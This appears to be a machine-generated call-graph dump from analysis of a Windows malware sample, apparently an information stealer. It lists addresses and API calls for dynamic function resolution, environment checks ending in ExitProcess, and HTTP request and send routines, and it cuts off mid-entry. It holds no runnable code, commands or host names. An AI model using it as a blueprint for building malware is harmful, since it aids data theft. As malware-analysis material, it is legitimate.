13904->13905 13906 6345c0 2 API calls 13905->13906 13907 632f4c 13906->13907 13908 6345c0 2 API calls 13907->13908 13909 632f65 13908->13909 13910 6345c0 2 API calls 13909->13910 13911 632f7e 13910->13911 13912 6345c0 2 API calls 13911->13912 13913 632f97 13912->13913 13914 6345c0 2 API calls 13913->13914 13915 632fb0 13914->13915 13916 6345c0 2 API calls 13915->13916 13917 632fc9 13916->13917 13918 6345c0 2 API calls 13917->13918 13919 632fe2 13918->13919 13920 6345c0 2 API calls 13919->13920 13921 632ffb 13920->13921 13922 6345c0 2 API calls 13921->13922 13923 633014 13922->13923 13924 6345c0 2 API calls 13923->13924 13925 63302d 13924->13925 13926 6345c0 2 API calls 13925->13926 13927 633046 13926->13927 13928 6345c0 2 API calls 13927->13928 13929 63305f 13928->13929 13930 6345c0 2 API calls 13929->13930 13931 633078 13930->13931 13932 6345c0 2 API calls 13931->13932 13933 633091 13932->13933 13934 6345c0 2 API calls 13933->13934 13935 6330aa 13934->13935 13936 6345c0 2 API calls 13935->13936 13937 6330c3 13936->13937 13938 6345c0 2 API calls 13937->13938 13939 6330dc 13938->13939 13940 6345c0 2 API calls 13939->13940 13941 6330f5 13940->13941 13942 6345c0 2 API calls 13941->13942 13943 63310e 13942->13943 13944 6345c0 2 API calls 13943->13944 13945 633127 13944->13945 13946 6345c0 2 API calls 13945->13946 13947 633140 13946->13947 13948 6345c0 2 API calls 13947->13948 13949 633159 13948->13949 13950 6345c0 2 API calls 13949->13950 13951 633172 13950->13951 13952 6345c0 2 API calls 13951->13952 13953 63318b 13952->13953 13954 6345c0 2 API calls 13953->13954 13955 6331a4 13954->13955 13956 6345c0 2 API calls 13955->13956 13957 6331bd 13956->13957 13958 6345c0 2 API calls 13957->13958 13959 6331d6 13958->13959 13960 6345c0 2 API calls 13959->13960 13961 6331ef 13960->13961 13962 6345c0 2 API calls 13961->13962 13963 633208 13962->13963 13964 6345c0 2 API calls 13963->13964 13965 633221 13964->13965 13966 6345c0 2 API calls 13965->13966 13967 63323a 13966->13967 13968 6345c0 2 API calls 13967->13968 13969 633253 13968->13969 13970 6345c0 2 API calls 13969->13970 13971 63326c 13970->13971 13972 6345c0 2 API calls 13971->13972 13973 633285 13972->13973 13974 6345c0 2 API calls 13973->13974 13975 63329e 13974->13975 13976 6345c0 2 API calls 13975->13976 13977 6332b7 13976->13977 13978 6345c0 2 API calls 13977->13978 13979 6332d0 13978->13979 13980 6345c0 2 API calls 13979->13980 13981 6332e9 13980->13981 13982 6345c0 2 API calls 13981->13982 13983 633302 13982->13983 13984 6345c0 2 API calls 13983->13984 13985 63331b 13984->13985 13986 6345c0 2 API calls 13985->13986 13987 633334 13986->13987 13988 6345c0 2 API calls 13987->13988 13989 63334d 13988->13989 13990 6345c0 2 API calls 13989->13990 13991 633366 13990->13991 13992 6345c0 2 API calls 13991->13992 13993 63337f 13992->13993 13994 6345c0 2 API calls 13993->13994 13995 633398 13994->13995 13996 6345c0 2 API calls 13995->13996 13997 6333b1 13996->13997 13998 6345c0 2 API calls 13997->13998 13999 6333ca 13998->13999 14000 6345c0 2 API calls 13999->14000 14001 6333e3 14000->14001 14002 6345c0 2 API calls 14001->14002 14003 6333fc 14002->14003 14004 6345c0 2 API calls 14003->14004 14005 633415 14004->14005 14006 6345c0 2 API calls 14005->14006 14007 63342e 14006->14007 14008 6345c0 2 API calls 14007->14008 14009 633447 14008->14009 14010 6345c0 2 API calls 14009->14010 14011 633460 14010->14011 14012 6345c0 2 API calls 14011->14012 14013 633479 14012->14013 14014 6345c0 2 API calls 14013->14014 14015 633492 14014->14015 14016 6345c0 2 API calls 14015->14016 14017 6334ab 14016->14017 14018 6345c0 2 API calls 14017->14018 14019 6334c4 14018->14019 14020 6345c0 2 API calls 14019->14020 14021 6334dd 14020->14021 14022 6345c0 2 API calls 14021->14022 14023 6334f6 14022->14023 14024 6345c0 2 API calls 14023->14024 14025 63350f 14024->14025 14026 6345c0 2 API calls 14025->14026 14027 633528 14026->14027 14028 6345c0 2 API calls 14027->14028 14029 633541 14028->14029 14030 6345c0 2 API calls 14029->14030 14031 63355a 14030->14031 14032 6345c0 2 API calls 14031->14032 14033 633573 14032->14033 14034 6345c0 2 API calls 14033->14034 14035 63358c 14034->14035 14036 6345c0 2 API calls 14035->14036 14037 6335a5 14036->14037 14038 6345c0 2 API calls 14037->14038 14039 6335be 14038->14039 14040 6345c0 2 API calls 14039->14040 14041 6335d7 14040->14041 14042 6345c0 2 API calls 14041->14042 14043 6335f0 14042->14043 14044 6345c0 2 API calls 14043->14044 14045 633609 14044->14045 14046 6345c0 2 API calls 14045->14046 14047 633622 14046->14047 14048 6345c0 2 API calls 14047->14048 14049 63363b 14048->14049 14050 6345c0 2 API calls 14049->14050 14051 633654 14050->14051 14052 6345c0 2 API calls 14051->14052 14053 63366d 14052->14053 14054 6345c0 2 API calls 14053->14054 14055 633686 14054->14055 14056 6345c0 2 API calls 14055->14056 14057 63369f 14056->14057 14058 6345c0 2 API calls 14057->14058 14059 6336b8 14058->14059 14060 6345c0 2 API calls 14059->14060 14061 6336d1 14060->14061 14062 6345c0 2 API calls 14061->14062 14063 6336ea 14062->14063 14064 6345c0 2 API calls 14063->14064 14065 633703 14064->14065 14066 6345c0 2 API calls 14065->14066 14067 63371c 14066->14067 14068 6345c0 2 API calls 14067->14068 14069 633735 14068->14069 14070 6345c0 2 API calls 14069->14070 14071 63374e 14070->14071 14072 6345c0 2 API calls 14071->14072 14073 633767 14072->14073 14074 6345c0 2 API calls 14073->14074 14075 633780 14074->14075 14076 6345c0 2 API calls 14075->14076 14077 633799 14076->14077 14078 6345c0 2 API calls 14077->14078 14079 6337b2 14078->14079 14080 6345c0 2 API calls 14079->14080 14081 6337cb 14080->14081 14082 6345c0 2 API calls 14081->14082 14083 6337e4 14082->14083 14084 6345c0 2 API calls 14083->14084 14085 6337fd 14084->14085 14086 6345c0 2 API calls 14085->14086 14087 633816 14086->14087 14088 6345c0 2 API calls 14087->14088 14089 63382f 14088->14089 14090 6345c0 2 API calls 14089->14090 14091 633848 14090->14091 14092 6345c0 2 API calls 14091->14092 14093 633861 14092->14093 14094 6345c0 2 API calls 14093->14094 14095 63387a 14094->14095 14096 6345c0 2 API calls 14095->14096 14097 633893 14096->14097 14098 6345c0 2 API calls 14097->14098 14099 6338ac 14098->14099 14100 6345c0 2 API calls 14099->14100 14101 6338c5 14100->14101 14102 6345c0 2 API calls 14101->14102 14103 6338de 14102->14103 14104 6345c0 2 API calls 14103->14104 14105 6338f7 14104->14105 14106 6345c0 2 API calls 14105->14106 14107 633910 14106->14107 14108 6345c0 2 API calls 14107->14108 14109 633929 14108->14109 14110 6345c0 2 API calls 14109->14110 14111 633942 14110->14111 14112 6345c0 2 API calls 14111->14112 14113 63395b 14112->14113 14114 6345c0 2 API calls 14113->14114 14115 633974 14114->14115 14116 6345c0 2 API calls 14115->14116 14117 63398d 14116->14117 14118 6345c0 2 API calls 14117->14118 14119 6339a6 14118->14119 14120 6345c0 2 API calls 14119->14120 14121 6339bf 14120->14121 14122 6345c0 2 API calls 14121->14122 14123 6339d8 14122->14123 14124 6345c0 2 API calls 14123->14124 14125 6339f1 14124->14125 14126 6345c0 2 API calls 14125->14126 14127 633a0a 14126->14127 14128 6345c0 2 API calls 14127->14128 14129 633a23 14128->14129 14130 6345c0 2 API calls 14129->14130 14131 633a3c 14130->14131 14132 6345c0 2 API calls 14131->14132 14133 633a55 14132->14133 14134 6345c0 2 API calls 14133->14134 14135 633a6e 14134->14135 14136 6345c0 2 API calls 14135->14136 14137 633a87 14136->14137 14138 6345c0 2 API calls 14137->14138 14139 633aa0 14138->14139 14140 6345c0 2 API calls 14139->14140 14141 633ab9 14140->14141 14142 6345c0 2 API calls 14141->14142 14143 633ad2 14142->14143 14144 6345c0 2 API calls 14143->14144 14145 633aeb 14144->14145 14146 6345c0 2 API calls 14145->14146 14147 633b04 14146->14147 14148 6345c0 2 API calls 14147->14148 14149 633b1d 14148->14149 14150 6345c0 2 API calls 14149->14150 14151 633b36 14150->14151 14152 6345c0 2 API calls 14151->14152 14153 633b4f 14152->14153 14154 6345c0 2 API calls 14153->14154 14155 633b68 14154->14155 14156 6345c0 2 API calls 14155->14156 14157 633b81 14156->14157 14158 6345c0 2 API calls 14157->14158 14159 633b9a 14158->14159 14160 6345c0 2 API calls 14159->14160 14161 633bb3 14160->14161 14162 6345c0 2 API calls 14161->14162 14163 633bcc 14162->14163 14164 6345c0 2 API calls 14163->14164 14165 633be5 14164->14165 14166 6345c0 2 API calls 14165->14166 14167 633bfe 14166->14167 14168 6345c0 2 API calls 14167->14168 14169 633c17 14168->14169 14170 6345c0 2 API calls 14169->14170 14171 633c30 14170->14171 14172 6345c0 2 API calls 14171->14172 14173 633c49 14172->14173 14174 6345c0 2 API calls 14173->14174 14175 633c62 14174->14175 14176 6345c0 2 API calls 14175->14176 14177 633c7b 14176->14177 14178 6345c0 2 API calls 14177->14178 14179 633c94 14178->14179 14180 6345c0 2 API calls 14179->14180 14181 633cad 14180->14181 14182 6345c0 2 API calls 14181->14182 14183 633cc6 14182->14183 14184 6345c0 2 API calls 14183->14184 14185 633cdf 14184->14185 14186 6345c0 2 API calls 14185->14186 14187 633cf8 14186->14187 14188 6345c0 2 API calls 14187->14188 14189 633d11 14188->14189 14190 6345c0 2 API calls 14189->14190 14191 633d2a 14190->14191 14192 6345c0 2 API calls 14191->14192 14193 633d43 14192->14193 14194 6345c0 2 API calls 14193->14194 14195 633d5c 14194->14195 14196 6345c0 2 API calls 14195->14196 14197 633d75 14196->14197 14198 6345c0 2 API calls 14197->14198 14199 633d8e 14198->14199 14200 6345c0 2 API calls 14199->14200 14201 633da7 14200->14201 14202 6345c0 2 API calls 14201->14202 14203 633dc0 14202->14203 14204 6345c0 2 API calls 14203->14204 14205 633dd9 14204->14205 14206 6345c0 2 API calls 14205->14206 14207 633df2 14206->14207 14208 6345c0 2 API calls 14207->14208 14209 633e0b 14208->14209 14210 6345c0 2 API calls 14209->14210 14211 633e24 14210->14211 14212 6345c0 2 API calls 14211->14212 14213 633e3d 14212->14213 14214 6345c0 2 API calls 14213->14214 14215 633e56 14214->14215 14216 6345c0 2 API calls 14215->14216 14217 633e6f 14216->14217 14218 6345c0 2 API calls 14217->14218 14219 633e88 14218->14219 14220 6345c0 2 API calls 14219->14220 14221 633ea1 14220->14221 14222 6345c0 2 API calls 14221->14222 14223 633eba 14222->14223 14224 6345c0 2 API calls 14223->14224 14225 633ed3 14224->14225 14226 6345c0 2 API calls 14225->14226 14227 633eec 14226->14227 14228 6345c0 2 API calls 14227->14228 14229 633f05 14228->14229 14230 6345c0 2 API calls 14229->14230 14231 633f1e 14230->14231 14232 6345c0 2 API calls 14231->14232 14233 633f37 14232->14233 14234 6345c0 2 API calls 14233->14234 14235 633f50 14234->14235 14236 6345c0 2 API calls 14235->14236 14237 633f69 14236->14237 14238 6345c0 2 API calls 14237->14238 14239 633f82 14238->14239 14240 6345c0 2 API calls 14239->14240 14241 633f9b 14240->14241 14242 6345c0 2 API calls 14241->14242 14243 633fb4 14242->14243 14244 6345c0 2 API calls 14243->14244 14245 633fcd 14244->14245 14246 6345c0 2 API calls 14245->14246 14247 633fe6 14246->14247 14248 6345c0 2 API calls 14247->14248 14249 633fff 14248->14249 14250 6345c0 2 API calls 14249->14250 14251 634018 14250->14251 14252 6345c0 2 API calls 14251->14252 14253 634031 14252->14253 14254 6345c0 2 API calls 14253->14254 14255 63404a 14254->14255 14256 6345c0 2 API calls 14255->14256 14257 634063 14256->14257 14258 6345c0 2 API calls 14257->14258 14259 63407c 14258->14259 14260 6345c0 2 API calls 14259->14260 14261 634095 14260->14261 14262 6345c0 2 API calls 14261->14262 14263 6340ae 14262->14263 14264 6345c0 2 API calls 14263->14264 14265 6340c7 14264->14265 14266 6345c0 2 API calls 14265->14266 14267 6340e0 14266->14267 14268 6345c0 2 API calls 14267->14268 14269 6340f9 14268->14269 14270 6345c0 2 API calls 14269->14270 14271 634112 14270->14271 14272 6345c0 2 API calls 14271->14272 14273 63412b 14272->14273 14274 6345c0 2 API calls 14273->14274 14275 634144 14274->14275 14276 6345c0 2 API calls 14275->14276 14277 63415d 14276->14277 14278 6345c0 2 API calls 14277->14278 14279 634176 14278->14279 14280 6345c0 2 API calls 14279->14280 14281 63418f 14280->14281 14282 6345c0 2 API calls 14281->14282 14283 6341a8 14282->14283 14284 6345c0 2 API calls 14283->14284 14285 6341c1 14284->14285 14286 6345c0 2 API calls 14285->14286 14287 6341da 14286->14287 14288 6345c0 2 API calls 14287->14288 14289 6341f3 14288->14289 14290 6345c0 2 API calls 14289->14290 14291 63420c 14290->14291 14292 6345c0 2 API calls 14291->14292 14293 634225 14292->14293 14294 6345c0 2 API calls 14293->14294 14295 63423e 14294->14295 14296 6345c0 2 API calls 14295->14296 14297 634257 14296->14297 14298 6345c0 2 API calls 14297->14298 14299 634270 14298->14299 14300 6345c0 2 API calls 14299->14300 14301 634289 14300->14301 14302 6345c0 2 API calls 14301->14302 14303 6342a2 14302->14303 14304 6345c0 2 API calls 14303->14304 14305 6342bb 14304->14305 14306 6345c0 2 API calls 14305->14306 14307 6342d4 14306->14307 14308 6345c0 2 API calls 14307->14308 14309 6342ed 14308->14309 14310 6345c0 2 API calls 14309->14310 14311 634306 14310->14311 14312 6345c0 2 API calls 14311->14312 14313 63431f 14312->14313 14314 6345c0 2 API calls 14313->14314 14315 634338 14314->14315 14316 6345c0 2 API calls 14315->14316 14317 634351 14316->14317 14318 6345c0 2 API calls 14317->14318 14319 63436a 14318->14319 14320 6345c0 2 API calls 14319->14320 14321 634383 14320->14321 14322 6345c0 2 API calls 14321->14322 14323 63439c 14322->14323 14324 6345c0 2 API calls 14323->14324 14325 6343b5 14324->14325 14326 6345c0 2 API calls 14325->14326 14327 6343ce 14326->14327 14328 6345c0 2 API calls 14327->14328 14329 6343e7 14328->14329 14330 6345c0 2 API calls 14329->14330 14331 634400 14330->14331 14332 6345c0 2 API calls 14331->14332 14333 634419 14332->14333 14334 6345c0 2 API calls 14333->14334 14335 634432 14334->14335 14336 6345c0 2 API calls 14335->14336 14337 63444b 14336->14337 14338 6345c0 2 API calls 14337->14338 14339 634464 14338->14339 14340 6345c0 2 API calls 14339->14340 14341 63447d 14340->14341 14342 6345c0 2 API calls 14341->14342 14343 634496 14342->14343 14344 6345c0 2 API calls 14343->14344 14345 6344af 14344->14345 14346 6345c0 2 API calls 14345->14346 14347 6344c8 14346->14347 14348 6345c0 2 API calls 14347->14348 14349 6344e1 14348->14349 14350 6345c0 2 API calls 14349->14350 14351 6344fa 14350->14351 14352 6345c0 2 API calls 14351->14352 14353 634513 14352->14353 14354 6345c0 2 API calls 14353->14354 14355 63452c 14354->14355 14356 6345c0 2 API calls 14355->14356 14357 634545 14356->14357 14358 6345c0 2 API calls 14357->14358 14359 63455e 14358->14359 14360 6345c0 2 API calls 14359->14360 14361 634577 14360->14361 14362 6345c0 2 API calls 14361->14362 14363 634590 14362->14363 14364 6345c0 2 API calls 14363->14364 14365 6345a9 14364->14365 14366 649c10 14365->14366 14367 64a036 8 API calls 14366->14367 14368 649c20 43 API calls 14366->14368 14369 64a146 14367->14369 14370 64a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14367->14370 14368->14367 14371 64a216 14369->14371 14372 64a153 8 API calls 14369->14372 14370->14369 14373 64a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14371->14373 14374 64a298 14371->14374 14372->14371 14373->14374 14375 64a2a5 6 API calls 14374->14375 14376 64a337 14374->14376 14375->14376 14377 64a344 9 API calls 14376->14377 14378 64a41f 14376->14378 14377->14378 14379 64a4a2 14378->14379 14380 64a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14378->14380 14381 64a4dc 14379->14381 14382 64a4ab GetProcAddress GetProcAddress 14379->14382 14380->14379 14383 64a515 14381->14383 14384 64a4e5 GetProcAddress GetProcAddress 14381->14384 14382->14381 14385 64a612 14383->14385 14386 64a522 10 API calls 14383->14386 14384->14383 14387 64a67d 14385->14387 14388 64a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14385->14388 14386->14385 14389 64a686 GetProcAddress 14387->14389 14390 64a69e 14387->14390 14388->14387 14389->14390 14391 64a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14390->14391 14392 645ca3 14390->14392 14391->14392 14393 631590 14392->14393 15512 631670 14393->15512 14396 64a7a0 lstrcpy 14397 6315b5 14396->14397 14398 64a7a0 lstrcpy 14397->14398 14399 6315c7 14398->14399 14400 64a7a0 lstrcpy 14399->14400 14401 6315d9 14400->14401 14402 64a7a0 lstrcpy 14401->14402 14403 631663 14402->14403 14404 645510 14403->14404 14405 645521 14404->14405 14406 64a820 2 API calls 14405->14406 14407 64552e 14406->14407 14408 64a820 2 API calls 14407->14408 14409 64553b 14408->14409 14410 64a820 2 API calls 14409->14410 14411 645548 14410->14411 14412 64a740 lstrcpy 14411->14412 14413 645555 14412->14413 14414 64a740 lstrcpy 14413->14414 14415 645562 14414->14415 14416 64a740 lstrcpy 14415->14416 14417 64556f 14416->14417 14418 64a740 lstrcpy 14417->14418 14457 64557c 14418->14457 14419 64a740 lstrcpy 14419->14457 14420 6452c0 25 API calls 14420->14457 14421 6451f0 20 API calls 14421->14457 14422 645643 StrCmpCA 14422->14457 14423 6456a0 StrCmpCA 14424 6457dc 14423->14424 14423->14457 14425 64a8a0 lstrcpy 14424->14425 14426 6457e8 14425->14426 14427 64a820 2 API calls 14426->14427 14429 6457f6 14427->14429 14428 645856 StrCmpCA 14430 645991 14428->14430 14428->14457 14431 64a820 2 API calls 14429->14431 14432 64a8a0 lstrcpy 14430->14432 14433 645805 14431->14433 14435 64599d 14432->14435 14434 631670 lstrcpy 14433->14434 14454 645811 14434->14454 14437 64a820 2 API calls 14435->14437 14436 64a820 lstrlen lstrcpy 14436->14457 14439 6459ab 14437->14439 14438 645a0b StrCmpCA 14440 645a16 Sleep 14438->14440 14441 645a28 14438->14441 14443 64a820 2 API calls 14439->14443 14440->14457 14445 64a8a0 lstrcpy 14441->14445 14442 64a7a0 lstrcpy 14442->14457 14444 6459ba 14443->14444 14446 631670 lstrcpy 14444->14446 14447 645a34 14445->14447 14446->14454 14448 64a820 2 API calls 14447->14448 14449 645a43 14448->14449 14450 64a820 2 API calls 14449->14450 14451 645a52 14450->14451 14453 631670 lstrcpy 14451->14453 14452 64578a StrCmpCA 14452->14457 14453->14454 14454->13511 14455 64593f StrCmpCA 14455->14457 14456 631590 lstrcpy 14456->14457 14457->14419 14457->14420 14457->14421 14457->14422 14457->14423 14457->14428 14457->14436 14457->14438 14457->14442 14457->14452 14457->14455 14457->14456 14458 64a8a0 lstrcpy 14457->14458 14458->14457 14460 647553 GetVolumeInformationA 14459->14460 14461 64754c 14459->14461 14462 647591 14460->14462 14461->14460 14463 6475fc GetProcessHeap RtlAllocateHeap 14462->14463 14464 647628 wsprintfA 14463->14464 14465 647619 14463->14465 14467 64a740 lstrcpy 14464->14467 14466 64a740 lstrcpy 14465->14466 14468 645da7 14466->14468 14467->14468 14468->13532 14470 64a7a0 lstrcpy 14469->14470 14471 634899 14470->14471 15521 6347b0 14471->15521 14473 6348a5 14474 64a740 lstrcpy 14473->14474 14475 6348d7 14474->14475 14476 64a740 lstrcpy 14475->14476 14477 6348e4 14476->14477 14478 64a740 lstrcpy 14477->14478 14479 6348f1 14478->14479 14480 64a740 lstrcpy 14479->14480 14481 6348fe 14480->14481 14482 64a740 lstrcpy 14481->14482 14483 63490b InternetOpenA StrCmpCA 14482->14483 14484 634944 14483->14484 14485 634ecb InternetCloseHandle 14484->14485 15527 648b60 14484->15527 14487 634ee8 14485->14487 15542 639ac0 CryptStringToBinaryA 14487->15542 14488 634963 15535 64a920 14488->15535 14491 634976 14493 64a8a0 lstrcpy 14491->14493 14498 63497f 14493->14498 14494 64a820 2 API calls 14495 634f05 14494->14495 14497 64a9b0 4 API calls 14495->14497 14496 634f27 ctype 14500 64a7a0 lstrcpy 14496->14500 14499 634f1b 14497->14499 14502 64a9b0 4 API calls 14498->14502 14501 64a8a0 lstrcpy 14499->14501 14513 634f57 14500->14513 14501->14496 14503 6349a9 14502->14503 14504 64a8a0 lstrcpy 14503->14504 14505 6349b2 14504->14505 14506 64a9b0 4 API calls 14505->14506 14507 6349d1 14506->14507 14508 64a8a0 lstrcpy 14507->14508 14509 6349da 14508->14509 14510 64a920 3 API calls 14509->14510 14511 6349f8 14510->14511 14512 64a8a0 lstrcpy 14511->14512 14514 634a01 14512->14514 14513->13535 14515 64a9b0 4 API calls 14514->14515 14516 634a20 14515->14516 14517 64a8a0 lstrcpy 14516->14517 14518 634a29 14517->14518 14519 64a9b0 4 API calls 14518->14519 14520 634a48 14519->14520 14521 64a8a0 lstrcpy 14520->14521 14522 634a51 14521->14522 14523 64a9b0 4 API calls 14522->14523 14524 634a7d 14523->14524 14525 64a920 3 API calls 14524->14525 14526 634a84 14525->14526 14527 64a8a0 lstrcpy 14526->14527 14528 634a8d 14527->14528 14529 634aa3 InternetConnectA 14528->14529 14529->14485 14530 634ad3 HttpOpenRequestA 14529->14530 14532 634b28 14530->14532 14533 634ebe InternetCloseHandle 14530->14533 14534 64a9b0 4 API calls 14532->14534 14533->14485 14535 634b3c 14534->14535 14536 64a8a0 lstrcpy 14535->14536 14537 634b45 14536->14537 14538 64a920 3 API calls 14537->14538 14539 634b63 14538->14539 14540 64a8a0 lstrcpy 14539->14540 14541 634b6c 14540->14541 14542 64a9b0 4 API calls 14541->14542 14543 634b8b 14542->14543 14544 64a8a0 lstrcpy 14543->14544 14545 634b94 14544->14545 14546 64a9b0 4 API calls 14545->14546 14547 634bb5 14546->14547 14548 64a8a0 lstrcpy 14547->14548 14549 634bbe 14548->14549 14550 64a9b0 4 API calls 14549->14550 14551 634bde 14550->14551 14552 64a8a0 lstrcpy 14551->14552 14553 634be7 14552->14553 14554 64a9b0 4 API calls 14553->14554 14555 634c06 14554->14555 14556 64a8a0 lstrcpy 14555->14556 14557 634c0f 14556->14557 14558 64a920 3 API calls 14557->14558 14559 634c2d 14558->14559 14560 64a8a0 lstrcpy 14559->14560 14561 634c36 14560->14561 14562 64a9b0 4 API calls 14561->14562 14563 634c55 14562->14563 14564 64a8a0 lstrcpy 14563->14564 14565 634c5e 14564->14565 14566 64a9b0 4 API calls 14565->14566 14567 634c7d 14566->14567 14568 64a8a0 lstrcpy 14567->14568 14569 634c86 14568->14569 14570 64a920 3 API calls 14569->14570 14571 634ca4 14570->14571 14572 64a8a0 lstrcpy 14571->14572 14573 634cad 14572->14573 14574 64a9b0 4 API calls 14573->14574 14575 634ccc 14574->14575 14576 64a8a0 lstrcpy 14575->14576 14577 634cd5 14576->14577 14578 64a9b0 4 API calls 14577->14578 14579 634cf6 14578->14579 14580 64a8a0 lstrcpy 14579->14580 14581 634cff 14580->14581 14582 64a9b0 4 API calls 14581->14582 14583 634d1f 14582->14583 14584 64a8a0 lstrcpy 14583->14584 14585 634d28 14584->14585 14586 64a9b0 4 API calls 14585->14586 14587 634d47 14586->14587 14588 64a8a0 lstrcpy 14587->14588 14589 634d50 14588->14589 14590 64a920 3 API calls 14589->14590 14591 634d6e 14590->14591 14592 64a8a0 lstrcpy 14591->14592 14593 634d77 14592->14593 14594 64a740 lstrcpy 14593->14594 14595 634d92 14594->14595 14596 64a920 3 API calls 14595->14596 14597 634db3 14596->14597 14598 64a920 3 API calls 14597->14598 14599 634dba 14598->14599 14600 64a8a0 lstrcpy 14599->14600 14601 634dc6 14600->14601 14602 634de7 lstrlen 14601->14602 14603 634dfa 14602->14603 14604 634e03 lstrlen 14603->14604 15541 64aad0 14604->15541 14606 634e13 HttpSendRequestA 14607 634e32 InternetReadFile 14606->14607 14608 634e67 InternetCloseHandle 14607->14608 14613 634e5e 14607->14613 14610 64a800 14608->14610 14610->14533 14611 64a9b0 4 API calls 14611->14613 14612 64a8a0 lstrcpy 14612->14613 14613->14607 14613->14608 14613->14611 14613->14612 15548 64aad0 14614->15548 14616 6417c4 StrCmpCA 14617 6417d7 14616->14617 14618 6417cf ExitProcess 14616->14618 14619 6419c2 14617->14619 14620 6418ad StrCmpCA 14617->14620 14621 6418cf StrCmpCA 14617->14621 14622 641970 StrCmpCA 14617->14622 14623 6418f1 StrCmpCA 14617->14623 14624 641951 StrCmpCA 14617->14624 14625 641932 StrCmpCA 14617->14625 14626 641913 StrCmpCA 14617->14626 14627 64185d StrCmpCA 14617->14627 14628 64187f StrCmpCA 14617->14628 14629 64a820 lstrlen lstrcpy 14617->14629 14619->13537 14620->14617 14621->14617 14622->14617 14623->14617 14624->14617 14625->14617 14626->14617 14627->14617 14628->14617 14629->14617 14631 64a7a0 lstrcpy 14630->14631 14632 635979 14631->14632 14633 6347b0 2 API calls 14632->14633 14634 635985 14633->14634 14635 64a740 lstrcpy 14634->14635 14636 6359ba 14635->14636 14637 64a740 lstrcpy 14636->14637 14638 6359c7 14637->14638 14639 64a740 lstrcpy 14638->14639 14640 6359d4 14639->14640 14641 64a740 lstrcpy 14640->14641 14642 6359e1 14641->14642 14643 64a740 lstrcpy 14642->14643 14644 6359ee InternetOpenA StrCmpCA 14643->14644 14645 635a1d 14644->14645 14646 635fc3 InternetCloseHandle 14645->14646 14648 648b60 3 API calls 14645->14648 14647 635fe0 14646->14647 14650 639ac0 4 API calls 14647->14650 14649 635a3c 14648->14649 14651 64a920 3 API calls 14649->14651 14652 635fe6 14650->14652 14653 635a4f 14651->14653 14655 64a820 2 API calls 14652->14655 14658 63601f ctype 14652->14658 14654 64a8a0 lstrcpy 14653->14654 14659 635a58 14654->14659 14656 635ffd 14655->14656 14657 64a9b0 4 API calls 14656->14657 14660 636013 14657->14660 14661 64a7a0 lstrcpy 14658->14661 14663 64a9b0 4 API calls 14659->14663 14662 64a8a0 lstrcpy 14660->14662 14672 63604f 14661->14672 14662->14658 14664 635a82 14663->14664 14665 64a8a0 lstrcpy 14664->14665 14666 635a8b 14665->14666 14667 64a9b0 4 API calls 14666->14667 14668 635aaa 14667->14668 14669 64a8a0 lstrcpy 14668->14669 14670 635ab3 14669->14670 14671 64a920 3 API calls 14670->14671 14673 635ad1 14671->14673 14672->13543 14674 64a8a0 lstrcpy 14673->14674 14675 635ada 14674->14675 14676 64a9b0 4 API calls 14675->14676 14677 635af9 14676->14677 14678 64a8a0 lstrcpy 14677->14678 14679 635b02 14678->14679 14680 64a9b0 4 API calls 14679->14680 14681 635b21 14680->14681 14682 64a8a0 lstrcpy 14681->14682 14683 635b2a 14682->14683 14684 64a9b0 4 API calls 14683->14684 14685 635b56 14684->14685 14686 64a920 3 API calls 14685->14686 14687 635b5d 14686->14687 14688 64a8a0 lstrcpy 14687->14688 14689 635b66 14688->14689 14690 635b7c InternetConnectA 14689->14690 14690->14646 14691 635bac HttpOpenRequestA 14690->14691 14693 635fb6 InternetCloseHandle 14691->14693 14694 635c0b 14691->14694 14693->14646 14695 64a9b0 4 API calls 14694->14695 14696 635c1f 14695->14696 14697 64a8a0 lstrcpy 14696->14697 14698 635c28 14697->14698 14699 64a920 3 API calls 14698->14699 14700 635c46 14699->14700 14701 64a8a0 lstrcpy 14700->14701 14702 635c4f 14701->14702 14703 64a9b0 4 API calls 14702->14703 14704 635c6e 14703->14704 14705 64a8a0 lstrcpy 14704->14705 14706 635c77 14705->14706 14707 64a9b0 4 API calls 14706->14707 14708 635c98 14707->14708 14709 64a8a0 lstrcpy 14708->14709 14710 635ca1 14709->14710 14711 64a9b0 4 API calls 14710->14711 14712 635cc1 14711->14712 14713 64a8a0 lstrcpy 14712->14713 14714 635cca 14713->14714 14715 64a9b0 4 API calls 14714->14715 14716 635ce9 14715->14716 14717 64a8a0 lstrcpy 14716->14717 14718 635cf2 14717->14718 14719 64a920 3 API calls 14718->14719 14720 635d10 14719->14720 14721 64a8a0 lstrcpy 14720->14721 14722 635d19 14721->14722 14723 64a9b0 4 API calls 14722->14723 14724 635d38 14723->14724 14725 64a8a0 lstrcpy 14724->14725 14726 635d41 14725->14726 14727 64a9b0 4 API calls 14726->14727 14728 635d60 14727->14728 14729 64a8a0 lstrcpy 14728->14729 14730 635d69 14729->14730 14731 64a920 3 API calls 14730->14731 14732 635d87 14731->14732 14733 64a8a0 lstrcpy 14732->14733 14734 635d90 14733->14734 14735 64a9b0 4 API calls 14734->14735 14736 635daf 14735->14736 14737 64a8a0 lstrcpy 14736->14737 14738 635db8 14737->14738 14739 64a9b0 4 API calls 14738->14739 14740 635dd9 14739->14740 14741 64a8a0 lstrcpy 14740->14741 14742 635de2 14741->14742 14743 64a9b0 4 API calls 14742->14743 14744 635e02 14743->14744 14745 64a8a0 lstrcpy 14744->14745 14746 635e0b 14745->14746 14747 64a9b0 4 API calls 14746->14747 14748 635e2a 14747->14748 14749 64a8a0 lstrcpy 14748->14749 14750 635e33 14749->14750 14751 64a920 3 API calls 14750->14751 14752 635e54 14751->14752 14753 64a8a0 lstrcpy 14752->14753 14754 635e5d 14753->14754 14755 635e70 lstrlen 14754->14755 15549 64aad0 14755->15549 14757 635e81 lstrlen GetProcessHeap RtlAllocateHeap 15550 64aad0 14757->15550 14759 635eae lstrlen 14760 635ebe 14759->14760 14761 635ed7 lstrlen 14760->14761 14762 635ee7 14761->14762 14763 635ef0 lstrlen 14762->14763 14764 635f04 14763->14764 14765 635f1a lstrlen 14764->14765 15551 64aad0 14765->15551 14767 635f2a HttpSendRequestA 14768 635f35 InternetReadFile 14767->14768 14769 635f6a InternetCloseHandle 14768->14769 14773 635f61 14768->14773 14769->14693 14771 64a9b0 4 API calls 14771->14773 14772 